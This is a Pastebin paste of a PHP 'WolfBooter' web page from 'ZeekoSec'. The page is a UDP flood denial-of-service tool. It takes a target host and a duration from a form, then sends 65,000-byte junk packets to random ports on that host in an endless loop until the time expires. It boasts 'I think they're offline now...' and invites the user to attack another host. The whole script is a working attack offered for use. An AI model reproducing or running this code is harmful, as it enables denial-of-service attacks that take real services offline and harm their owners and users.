Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <body>
- <center>
- <font color="ff307c">
- <pre>
- <FONT COLOR="65ff57"><h1>ZeekoSec - WolfBooter</h1></FONT>
- </pre>
- <STYLE>
- input{
- background-color: #ff307c; font-size: 8pt; color: #ffb545; font-family: Tahoma; border: 1 solid #66;
- }
- button{
- background-color: #98AFC7; font-size: 8pt; color: ##ffb545; font-family: "Lucida Console; border: 1 solid #66;
- }
- body {
- background: url(http://freetopwallpaper.com/wp-content/gallery/cloud/cloud-wallpaper-hd-background-47.jpg);
- }
- </style>
- <?php
- //UDP
- if(isset($_GET['host'])&&isset($_GET['time'])){
- $packets = 0;
- ignore_user_abort(TRUE);
- set_time_limit(0);
- $exec_time = $_GET['time'];
- $time = time();
- //print "Started: ".time('d-m-y h:i:s')."<br>";
- $max_time = $time+$exec_time;
- $host = $_GET['host'];
- for($i=0;$i<65000;$i++){
- $out .= 'X';
- }
- while(1){
- $packets++;
- if(time() > $max_time){
- break;
- }
- $rand = rand(1,65000);
- $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
- if($fp){
- fwrite($fp, $out);
- fclose($fp);
- }
- }
- echo "<br><b>I think they're offline now...</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
- echo '<br><br>
- <form action="'.$surl.'" method=GET>
- <input type="hidden" name="act" value="engine">
- Try another? Host: <br><input type=text name=host><br>
- It only takes a few seconds! Time: <br><input type=text name=time><br>
- <input type=submit value=Go></form>';
- }else{ echo '<br><b>Start all engines!</b><br><br>
- <form action=? method=GET>
- <input type="hidden" name="act" value="engine">
- Host: <br><input type=text name=host value=><br>
- Time: <br><input type=text name=time value=><br>
- <input type=submit value=Go></form>';
- }
- ?>
- </center>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement